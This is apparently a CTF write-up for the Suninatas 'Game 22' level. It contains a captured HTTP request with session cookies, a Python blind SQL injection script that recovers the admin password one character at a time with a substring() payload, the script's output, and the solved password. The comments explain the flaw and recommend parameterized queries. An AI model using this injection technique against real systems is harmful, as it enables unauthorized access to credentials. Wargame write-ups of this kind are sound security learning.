Suninatas Game 22

challenges

Game 22

Blind Sql Injection Filtering Keywords select / Union / or / white space / by /
having from / char / ascii / left / right / delay / 0x ..........

<!-- Hint : guest / guest & Your goal is to find the admin's pw -->
<!-- M@de by 2theT0P -->

GET /challenge/web22/web22.asp?id=admin&pw=admin HTTP/1.1
Host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Dnt: 1
Sec-Gpc: 1
Connection: keep-alive
Referer: http://suninatas.com/challenge/web22/web22.asp?id=admin&pw=admin
Cookie: ASP.NET_SessionId=3g042optmn40uhuoxlqhkvai; ASPSESSIONIDACTRACSS=MEJDPMPAHECDELCJCFEOEINE; ASPSESSIONIDCCTSAAQT=NNMDDJIBCMFACGADEKFHFNCA; ASPSESSIONIDQSBTDCST=DNDPAPJCEPOJPKPFACBKBPKJ; auth%5Fkey=65038b0559e459420aa2d23093d01e4a; ASPSESSIONIDAARSBCRR=NNOJOPPCBMOBJCNACCPNBHIP; ASPSESSIONIDCCTQCCSR=FLDDKMEDLOFIPEODAHAPDDID
Upgrade-Insecure-Requests: 1
import requests
import string

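# Solver for the Suninatas "Game 22" wargame level: recovers the admin's `pw`
# value one character at a time by appending a boolean condition to the `id`
# parameter and checking whether the response contains "OK".
#
# Root cause on the server side (inferred from the behaviour shown on this
# page, not from its source): `id` is concatenated into a SQL statement, and a
# keyword blacklist does not stop boolean inference. The durable fix is a
# parameterized query, not a longer blacklist.
url = "http://suninatas.com/challenge/web22/web22.asp"

# Session cookies copied from the author's browser. These are credentials for
# that session: do not reuse them, and prefer loading such values from the
# environment instead of committing them to a write-up or repository.
cookies = {
    "ASP.NET_SessionId": "3g042optmn40uhuoxlqhkvai",
    "ASPSESSIONIDACTRACSS": "MEJDPMPAHECDELCJCFEOEINE",
    "ASPSESSIONIDCCTSAAQT": "NNMDDJIBCMFACGADEKFHFNCA",
    "ASPSESSIONIDQSBTDCST": "DNDPAPJCEPOJPKPFACBKBPKJ",
    "auth_key": "65038b0559e459420aa2d23093d01e4a",
    "ASPSESSIONIDAARSBCRR": "NNOJOPPCBMOBJCNACCPNBHIP",
    "ASPSESSIONIDCCTQCCSR": "FLDDKMEDLOFIPEODAHAPDDID",
    "ASPSESSIONIDCCRRBDTT": "AGEJLNGDPEFCCNCGDHAPBLEH",
}

# Candidate characters tried at each position.
charset = string.ascii_letters + string.digits + "!@#$%^&*()_+"

password = ""
# Probe positions 1..30; the loop stops early at the first position where no
# candidate matches.
for i in range(1, 31):
    found_char = False
    for char in charset:
        # substring(pw, index, length)
        payload = f"'and(substring(pw,{i},1)='{char}')--"

        params = {
            "id": "admin" + payload,
            "pw": "a",
        }

        try:
            # Let requests percent-encode the query string. Building the URL by
            # hand sends `+`, `&`, `#` and `%` raw: `+` is decoded as a space,
            # `&` splits the parameter and `#` starts a fragment, so those
            # candidates are never really tested and `+` can produce false
            # positives past the end of the value.
            # The timeout keeps a stalled connection from hanging the run.
            r = requests.get(url, params=params, cookies=cookies, timeout=10)
        except requests.RequestException as e:
            # NOTE: a failed request means this candidate was not tested, so a
            # transient network error can make the result incomplete.
            print(f"[!] Error: {e}")
            continue

        # "OK" in the body is treated as the true branch of the condition.
        if "OK" in r.text:
            password += char
            print(f"[+] Found char at index {i}: {char}")
            found_char = True
            break

    if not found_char:
        print("[-] End of password or char not in charset.")
        break

print(f"\n[SUCCESS] Final Password: {password}")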
[+] Found char at index 1: N
[+] Found char at index 2: 1
[+] Found char at index 3: c
[+] Found char at index 4: 3
[+] Found char at index 5: B
[+] Found char at index 6: i
[+] Found char at index 7: l
[+] Found char at index 8: n
[+] Found char at index 9: l
[+] Found char at index 10: )
[+] Found char at index 11: +
[+] Found char at index 12: +
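...
The `+` hits from index 11 onward are false positives, not part of the password: a raw `+` in a query string is decoded by the server as a space, so those probes were not testing a literal plus sign (the space presumably compares equal to the empty result past the end of the value). The admin password is the first 10 characters:
N1c3Bilnl)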